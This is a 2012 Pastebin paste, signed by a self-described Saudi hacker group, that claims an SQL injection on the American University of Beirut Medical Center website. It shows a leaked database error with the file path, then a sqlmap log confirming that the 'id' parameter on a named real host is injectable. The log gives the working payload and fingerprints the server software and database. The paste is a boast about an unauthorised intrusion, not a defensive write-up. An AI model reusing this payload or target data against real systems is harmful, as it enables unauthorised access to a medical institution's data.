API tools faq
paste
Advertisement
Islam-Hacker

aubmc.org.lb sql injection by jm511

Islam-Hacker
Sep 10th, 2012
382
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.13 KB | None | 0 0
raw download clone embed print report
  1. JM511 Was Here :)
  2. Saudi Arabian Hackers
  3. =========================
  4. الجامعة الامريكية في بيروت
  5. =========================
  6. ثغرة حقن
  7. =========================
  8. Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
  9.  
  10. [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'id = 40''.
  11.  
  12. /users/subpage.asp, line 10
  13.  
  14. aubmc.org.lb
  15.  
  16. sqlmap/0.9 - automatic SQL injection and database takeover tool
  17. http://sqlmap.sourceforge.net
  18.  
  19. [*] starting at: 20:29:14
  20.  
  21. [20:29:14] [INFO] using '/home/jm511/.sqlmap/output/www.intmed.aubmc.org.lb/session' as session file
  22. [20:29:15] [INFO] testing connection to the target url
  23. [20:29:16] [INFO] testing if the url is stable, wait a few seconds
  24. [20:29:19] [INFO] url is stable
  25. [20:29:19] [INFO] testing if GET parameter 'id' is dynamic
  26. [20:29:20] [INFO] confirming that GET parameter 'id' is dynamic
  27. [20:29:21] [INFO] GET parameter 'id' is dynamic
  28. [20:29:22] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: Microsoft Access)
  29. [20:29:22] [INFO] testing sql injection on GET parameter 'id'
  30. [20:29:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  31. [20:29:26] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
  32. parsed error message(s) showed that the back-end DBMS could be Microsoft Access. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
  33. [20:31:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
  34. GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
  35. sqlmap identified the following injection points with a total of 15 HTTP(s) requests:
  36. ---
  37. Place: GET
  38. Parameter: id
  39. Type: boolean-based blind
  40. Title: AND boolean-based blind - WHERE or HAVING clause
  41. Payload: id=150 AND 485=485
  42. ---
  43.  
  44. [20:31:33] [INFO] testing Microsoft Access
  45. [20:31:34] [INFO] confirming Microsoft Access
  46. [20:31:36] [INFO] the back-end DBMS is Microsoft Access
  47. web server operating system: Windows 2003
  48. web application technology: ASP.NET, Microsoft IIS 6.0, ASP
  49. back-end DBMS: Microsoft Access
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!